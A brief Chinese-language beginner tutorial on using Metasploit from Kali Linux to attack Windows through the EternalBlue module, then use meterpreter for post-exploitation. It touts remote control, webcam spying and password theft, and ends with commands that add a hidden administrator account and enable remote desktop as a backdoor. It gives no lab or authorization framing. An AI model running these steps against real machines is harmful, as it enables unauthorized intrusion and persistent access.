1、metasploit是什么?
msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新,metasploit让复杂的漏洞攻击流程变得非常简单。
2、启动metasploit
- 打开kali终端
- 使用 sudo su 命令,并输入kali的密码切换至root用户
- 使用 msfdb init 命令初始化metasploit数据库(*可选)
3、metasploit攻击windows操作系统
msfconsole:启动metasploit命令行 [命令行效率高,使用方便]
msf使用法则:
使用模块-》配置模块必选项-》运行模块
三步操作,就能实现主流漏洞的攻击
4、msf永恒之蓝攻击
- 搜索永恒之蓝漏洞模块名称(自己百度或者kali工具使用大全)
- 使用模块: use 模块名称
- 设置必选项(查看必选项【required 为yes的就是必选项】:show options):set 必选项名称
- 设置完成之后:run 运行模块
这种方式攻击目标机器前提条件:目标机器上要有此漏洞,没有此漏洞则攻击会攻击失败(后续会介绍自己生成木马病毒,钓鱼,开后门)
5、攻击之后能做什么
meterpreter是强大的后渗透模块,可以输入help查看帮助信息
远程控制、命令执行、摄像头监控、密码获取、创建后门、破坏篡改系统......这些看起来非常复杂又高级的操作都能用meterpreter模块中的一行或几个字母,简单的命令完成。
不过,像一些需要用到目标机器外设的操作前提是目标机器要有,比如说摄像头监控,目标机器没有摄像头就不能进行监控成功
列举操作:创建后门用户并开启远程连接
shell
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
exit
run getgui -e
持续更新,敬请关注